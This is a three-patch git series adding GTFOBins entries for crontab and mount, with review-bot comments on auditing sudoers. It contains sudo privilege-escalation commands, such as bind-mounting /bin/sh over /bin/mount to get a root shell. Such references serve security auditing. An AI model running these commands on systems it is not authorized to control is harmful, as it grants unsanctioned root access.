From 85b99ce89fec809ad7dc48ef173b0ad8b8f37241 Mon Sep 17 00:00:00 2001
From: kk
Date: Mon, 16 Jul 2018 10:00:14 +0200
Subject: [PATCH 1/3] added crontab and mount

---
 _gtfobins/crontab.md | 7 +++++++
 _gtfobins/mount.md | 8 ++++++++
 2 files changed, 15 insertions(+)
 create mode 100644 _gtfobins/crontab.md
 create mode 100644 _gtfobins/mount.md

diff --git a/_gtfobins/crontab.md b/_gtfobins/crontab.md
new file mode 100644
index 0000000..c431725
--- /dev/null
+++ b/_gtfobins/crontab.md
@@ -0,0 +1,7 @@
+---
+functions:
+ sudo-enabled:
+ - description: edit root's crontab and run arbitrary commands as root.
+ code: |
+ sudo crontab -e
+---
diff --git a/_gtfobins/mount.md b/_gtfobins/mount.md
new file mode 100644
index 0000000..d76c4ff
--- /dev/null
+++ b/_gtfobins/mount.md
@@ -0,0 +1,8 @@
+---
+functions:
+ sudo-enabled:
+ - description: bind mount bash to the mount binary, as mount is sudo enabled.
+ code: |
+ sudo mount -o bind /bin/bash /bin/mount
+ sudo mount
+---

From e50f44521ec2656dcfeda2df433587ca31fd41d8 Mon Sep 17 00:00:00 2001
From: Andrea Cardaci
Date: Mon, 16 Jul 2018 13:37:17 +0200
Subject: [PATCH 2/3] Improve crontab

---
 _gtfobins/crontab.md | 8 +++++---
 1 file changed, 5 insertions(+), 3 deletions(-)

diff --git a/_gtfobins/crontab.md b/_gtfobins/crontab.md
index c431725..12ac6ae 100644
--- a/_gtfobins/crontab.md
+++ b/_gtfobins/crontab.md
@@ -1,7 +1,9 @@
 ---
 functions:
+ execute-non-interactive:
+ - description: The commands are executed according to the crontab file edited via the `crontab` utility.
+ code: crontab -e
 sudo-enabled:
- - description: edit root's crontab and run arbitrary commands as root.
- code: |
- sudo crontab -e
+ - description: The commands are executed according to the crontab file edited via the `crontab` utility.
+ code: sudo crontab -e
 ---

From a00f6897600e2a11d52aa7be8f8401414ec71106 Mon Sep 17 00:00:00 2001
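Review bot: In the [PATCH 2/3] hunk for `_gtfobins/crontab.md`, the `sudo-enabled` entry now repeats the `execute-non-interactive` description word for word, so it no longer says whose crontab is edited or which user the jobs run as, which the removed line did state. That detail is what tells a reader auditing sudoers that a grant on `crontab` is equivalent to unrestricted root, so I would keep it, for example `description: The crontab edited via sudo is root's, so the scheduled commands run as root.` Separately, `crontab -e` opens an editor, so the `execute-non-interactive` entry would be clearer with a sentence saying that only the scheduled job runs without interaction, not the edit itself.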
From: Andrea Cardaci
Date: Mon, 16 Jul 2018 13:47:09 +0200
Subject: [PATCH 3/3] Improve mount

---
 _gtfobins/mount.md | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/_gtfobins/mount.md b/_gtfobins/mount.md
index d76c4ff..104e35e 100644
--- a/_gtfobins/mount.md
+++ b/_gtfobins/mount.md
@@ -1,8 +1,8 @@
 ---
 functions:
 sudo-enabled:
- - description: bind mount bash to the mount binary, as mount is sudo enabled.
+ - description: Exploit the fact that `mount` can be executed via `sudo` to *replace* the `mount` binary with a shell.
 code: |
- sudo mount -o bind /bin/bash /bin/mount
+ sudo mount -o bind /bin/sh /bin/mount
 sudo mount
 ---
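Review bot: The new description says the `mount` binary is *replaced* but not that the bind mount shadows `/bin/mount` for every process in the same mount namespace and stays in place until it is unmounted. That side effect matters to anyone reproducing the entry on a shared or production host, so I would append a sentence such as `The bind mount affects the whole system and persists until it is removed.` to the description. For auditing, the entry could also note that the mount table then lists a mount whose target is the `/bin/mount` file, and that a sudoers rule for `mount` should therefore be treated as full root.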